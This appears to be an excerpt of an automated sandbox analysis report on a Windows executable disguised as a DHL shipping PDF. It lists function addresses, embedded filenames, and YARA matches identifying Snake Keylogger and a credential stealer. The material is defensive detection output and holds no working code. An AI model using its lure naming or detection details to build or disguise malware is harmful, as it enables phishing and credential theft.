                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB1CB70_2_02DB1CB7
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB62C00_2_02DB62C0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB62B00_2_02DB62B0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB30E00_2_02DB30E0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB27DB0_2_02DB27DB
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB47F10_2_02DB47F1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB57100_2_02DB5710
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB57000_2_02DB5700
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB6AD90_2_02DB6AD9
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB6AE80_2_02DB6AE8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB48B50_2_02DB48B5
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DBDDB80_2_02DBDDB8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB6D400_2_02DB6D40
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB6D300_2_02DB6D30
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A180A600_2_0A180A60
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A186D000_2_0A186D00
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A1894B00_2_0A1894B0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A186CEA0_2_0A186CEA
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A19D2500_2_0A19D250
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A1917C00_2_0A1917C0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A1917BA0_2_0A1917BA
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A6947800_2_0A694780
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A690EC10_2_0A690EC1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A690F200_2_0A690F20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7429700_2_0A742970
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7412300_2_0A741230
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7407D80_2_0A7407D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7464F00_2_0A7464F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A74A4B00_2_0A74A4B0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7405F00_2_0A7405F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7419F00_2_0A7419F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A74C3400_2_0A74C340
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7400400_2_0A740040
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7400070_2_0A740007
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A7416D80_2_0A7416D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0258080_2_0F025808
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F027A900_2_0F027A90
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0200060_2_0F020006
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0200400_2_0F020040
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0204680_2_0F020468
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0204780_2_0F020478
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0208A80_2_0F0208A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0208B00_2_0F0208B0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F0224B80_2_0F0224B8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104C1682_2_0104C168
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104A7F22_2_0104A7F2
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104CAB02_2_0104CAB0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_01044F082_2_01044F08
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_01047E682_2_01047E68
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104C37B2_2_0104C37B
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_010427B92_2_010427B9
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104B9DC2_2_0104B9DC
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104B9E02_2_0104B9E0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104CAAE2_2_0104CAAE
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_01042DDB2_2_01042DDB
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_01047E662_2_01047E66
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_01044EFB2_2_01044EFB
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065577802_2_06557780
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06551C582_2_06551C58
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065545002_2_06554500
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065515F82_2_065515F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06556A202_2_06556A20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655F6302_2_0655F630
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655F6202_2_0655F620
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655A6C82_2_0655A6C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655D6902_2_0655D690
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655D6822_2_0655D682
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655A6B92_2_0655A6B9
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06552F482_2_06552F48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655AF782_2_0655AF78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655AF682_2_0655AF68
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06552F382_2_06552F38
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065537F82_2_065537F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065537E82_2_065537E8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06553C502_2_06553C50
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06553C422_2_06553C42
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06551C492_2_06551C49
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655BC712_2_0655BC71
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655DC122_2_0655DC12
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655DC202_2_0655DC20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655E4D02_2_0655E4D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655E4C02_2_0655E4C0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065504982_2_06550498
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655BC802_2_0655BC80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065504892_2_06550489
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06559CA02_2_06559CA0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06550D432_2_06550D43
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06550D482_2_06550D48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655ED702_2_0655ED70
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655C5302_2_0655C530
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655C5202_2_0655C520
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655CDD02_2_0655CDD0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065515F32_2_065515F3
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655CDE02_2_0655CDE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655ED802_2_0655ED80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655A2702_2_0655A270
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655FA782_2_0655FA78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655A2612_2_0655A261
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655D2382_2_0655D238
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06552AF02_2_06552AF0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06552AE02_2_06552AE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655FA882_2_0655FA88
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655AB102_2_0655AB10
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655AB202_2_0655AB20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655B3D02_2_0655B3D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655B3C12_2_0655B3C1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065533922_2_06553392
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065533A02_2_065533A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065500402_2_06550040
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655E0782_2_0655E078
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655E0682_2_0655E068
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655001E2_2_0655001E
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655B8182_2_0655B818
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655B8282_2_0655B828
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655C0D82_2_0655C0D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655C0CA2_2_0655C0CA
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065508F02_2_065508F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065508EB2_2_065508EB
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065540982_2_06554098
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065540A82_2_065540A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655C97A2_2_0655C97A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655E9222_2_0655E922
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655E9282_2_0655E928
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655F1D82_2_0655F1D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655F1C82_2_0655F1C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065511972_2_06551197
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655C9882_2_0655C988
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_065511A02_2_065511A0
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: invalid certificate
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.00000000031E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1111503634.000000000A8C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1111394214.000000000A890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.00000000046F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1105672095.00000000012EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3534770188.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3535022261.0000000000BE7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeBinary or memory string: OriginalFilenameZzdw.exeX vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: Section: AGB[a"h3 ZLIB complexity 1.0003868508454106
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
